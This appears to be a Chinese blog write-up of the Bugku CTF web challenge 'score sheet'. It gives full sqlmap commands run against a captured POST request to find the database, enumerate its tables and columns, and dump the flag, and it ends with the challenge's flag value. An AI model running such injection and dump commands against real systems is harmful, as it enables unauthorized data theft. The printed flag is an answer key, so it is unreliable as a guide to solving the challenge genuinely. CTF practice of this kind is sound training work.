Bugku-WEB-成绩单(SQLMap注入)

成绩单
链接:http://120.24.86.145:8002/chengjidan/
在这里插入图片描述

这个一看应该是SQL注入 先提交一个数据看看

在这里插入图片描述

发现有一个post数据 那就利用这个数据注入白

先抓包

在这里插入图片描述

然后点击action——>从copy to file

我保存在了 D盘Bugku.txt
在这里插入图片描述
先打开sqlmap,测试目标网址使用的数据库:sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --current-d
在这里插入图片描述
得到当前使用数据库skctf_flag

之后爆数据库中的表:sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --table -D “skctf_flag”
在这里插入图片描述
获得数据库中的表fl4g和sc,看来flag像是在fl4g中:

爆f14g的列:Sqlmap sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --column -T “fl4g” -D “skctf_flag”
在这里插入图片描述
得到表fl4g中的列skctf_flag。

继续爆列skctf_flag中的字段:sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --dump -C “skctf_flag” -T “fl4g” -D “skctf_flag”
在这里插入图片描述
得到flag:BUGKU{Sql_INJECT0N_4813drd8hz4}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值